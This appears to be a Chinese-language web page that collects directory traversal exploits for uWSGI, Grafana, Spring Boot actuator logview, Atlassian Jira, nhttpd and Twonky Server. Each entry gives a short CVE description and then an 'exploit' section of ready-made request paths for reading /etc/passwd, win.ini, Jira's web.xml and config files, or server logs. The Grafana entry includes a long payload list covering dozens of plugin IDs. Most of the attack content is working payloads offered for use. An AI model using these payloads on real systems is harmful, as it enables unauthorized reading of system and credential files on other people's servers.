uWSGI 目录穿越(CVE-2018-7490)
uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。
exploit
http://IP:port/…%2f…%2f…%2f…%2f/etc/passwd
grafana 目录遍历 (CVE-2021-43798)
Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。
exploit
http://IP:port/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd
Spring Boot 目录遍历 (CVE-2021-21234)
Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,Spring Boot致力于在蓬勃发展的快速应用开发领域(rapid application development)成为领导者。 spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端点公开日志文件目录。要查看的文件名和基本文件夹(相对于日志文件夹根)都可以通过请求参数指定。虽然检查了文件名参数以防止目录遍历攻击(因此filename=../somefile 将不起作用),但没有充分检查基本文件夹参数,因此filename=somefile&base=../ 可以访问日志记录基目录之外的文件)。该漏洞已在 0.2.13 版中修复。0.2.12 的任何用户都应该能够毫无问题地进行更新,因为该版本中没有其他更改。除了更新或删除依赖项之外,没有解决此漏洞的方法。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。此外,可以通过在反向代理后面部署应用程序来限制对 logview 端点的访问。
exploit
此漏洞存在于日志文件查看器
路径:http://IP:port/manage/log/
Windows路径:
manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
Linux路径:
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/etc/passwd&base=../../../../../../../../../../
Atlassian Jira 路径遍历 (CVE-2021-26086)
Atlassian JIRA是一个项目管理和开发管理工具,Atlassian Jira 服务器和数据中心版本允许远程攻击者通过 /WEB-INF/web.xml 端点中的路径遍历漏洞读取特定文件。受影响的版本为 8.5.14 之前的版本、8.13.6 之前的 8.6.0 版本以及 8.16.1 之前的 8.14.0 版本。
exploit
/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
nhttpd 目录遍历 (CVE-2011-0751)
Nostromo nhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。 nhttpd(又名 Nostromo 网络服务器)中的目录遍历漏洞允许远程攻击者通过 URI 中的 …%2f(编码点点斜线)执行任意程序或读取任意文件 在其根目录下访问/…%2flogs/access_log,即可查看log。
exploit
http://IP:port/…%2flogs/access_log
http://IP:port/…%2fetc/passwd
twonkyserver 目录遍历 (CVE-2018-7171)
LYNX Twonky Server是美国LYNX TECHNOLOGY公司的一款媒体服务器,支持在连接的设备之间共享媒体内容。 LYNX Twonky Server 7.0.11版本至8.5版本中存在目录遍历漏洞。远程攻击者可通过向rpc/set_all发送带有‘…’序列的‘contentbase’参数利用该漏洞分享任意目录的内容。
exploit
http://IP:port/rpc/set_all
http://IP:port/rpc/dir?path=
京公网安备 11010802041100号